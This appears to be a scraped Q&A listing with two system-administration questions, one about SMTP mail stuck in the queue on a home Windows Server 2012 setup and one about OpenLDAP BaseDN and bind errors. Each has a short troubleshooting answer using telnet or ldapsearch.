  • Trying to Set up SMTP Server on Windows Server 2012

    - by datc
    I'm working on a website, and I need to test the functionality of sending email messages from ASP.NET, something like this:

        Dim msg As New MailMessage("email1", "email2")
        msg.Subject = "Subject"
        msg.IsBodyHtml = True
        msg.Body = "Click <a href='site'>here</a>."

        Dim client As SmtpClient = New SmtpClient()
        client.Host = "My-Server"
        client.Port = 25
        client.DeliveryMethod = SmtpDeliveryMethod.Network
        client.Send(msg)

    This is running from a Windows 8 workstation. I've installed the SMTP server on my Windows Server 2012 machine. The mail shows up in the mailroot/Queue folder and sits there, eventually getting deposited into Badmail.

    Now, I have AT&T U-verse at home and a few devices connected to the gateway, including, let's call it, "My-Server". When I run SmtpDiag from, say, datc@... to datc@hotmail.com, I get "SOA serial number match: passed", but the Local DNS (99-135-60-233.lightspeed.bcvloh.sbcglobal.net) and Remote DNS (hotmail.com) tests are *not* passed, and ultimately:

        Connecting to the server failed. Error: 10060.
        Failed to submit mail to mx2.hotmail.com.

    When I set My-Server's IP to static and equal to the external IP, 99.135.60.233, and run SmtpDiag again, I get the SOA, Local DNS, and Remote DNS tests passed, but the same 10060 error. Same for yahoo.com, gmail.com, and so forth.

    Is it my ISP's job to fix this? Some PTR record missing somewhere? Is it at all possible to have a home-based SMTP server? All I want is to test my email code. Perhaps my IP address is just not "trusted" somehow. Thanks.
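
    A small check worth running, hedged: a 10060 timeout against every remote MX frequently means the ISP blocks outbound TCP 25 from residential connections, in which case no local SMTP configuration will help and mail has to be relayed through the ISP's or another provider's submission server instead. The command below only tests reachability (the Telnet Client feature may need to be installed first):

        telnet mx2.hotmail.com 25

    If the connection opens, a banner starting with 220 appears; if it just times out, port 25 is being filtered somewhere upstream.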

    Read the article

  • What is my BaseDN supposed to be with the following configuration of OpenLDAP?

    - by fuzzy lollipop
    I have the following in my OpenLDAP configuration, using the latest version of OpenLDAP on CentOS 5.3, installed using yum.

    From my /etc/openldap/slapd.conf:

        database bdb
        suffix "dc=company,dc=com"
        rootdn "cn=Manager,dc=company,dc=com"

    From my /etc/openldap/ldap.conf:

        BASE dc=company,dc=com

    I have successfully added an entry with ldapadd and retrieved it with ldapsearch from a local bash shell on the box. Now I am trying to get a graphical editor to connect to this server remotely so I can enter people from my laptop, but I am having no luck. I tried JXplorer, and it connects with an anonymous bind without me having to specify a BaseDN, but I can't edit anything that way. If I try to give it a username and password - using Manager and my rootpw, which is in clear text just for testing - every GUI client on my remote laptop complains about my BaseDN not being in the correct format when I enter dc=company,dc=com; I also tried cn=Manager,dc=company,dc=com.

        Error opening connection: [LDAP: error code 34 - invalid DN]

    I have tried multiple clients and all of them connect as anonymous; none let me connect authenticated so that I can actually create or edit anything. I am using Manager as my username and the password from rootpw - is that correct?
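
    A minimal sketch of the bind the GUI clients should be performing, runnable from the laptop with the standard OpenLDAP tools (hostname and password are placeholders). The base stays dc=company,dc=com, but the "username" field of a GUI client normally expects the full bind DN rather than the bare word Manager; error 34 (invalid DN) is what slapd returns when it is handed a name that is not a DN:

        ldapsearch -x -H ldap://ldap.company.com \
            -D "cn=Manager,dc=company,dc=com" -w secret \
            -b "dc=company,dc=com" "(objectClass=*)"

    If this works remotely but the GUI still fails, the problem is in how the client's fields map to bind DN vs. base DN rather than in slapd itself.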

    Read the article
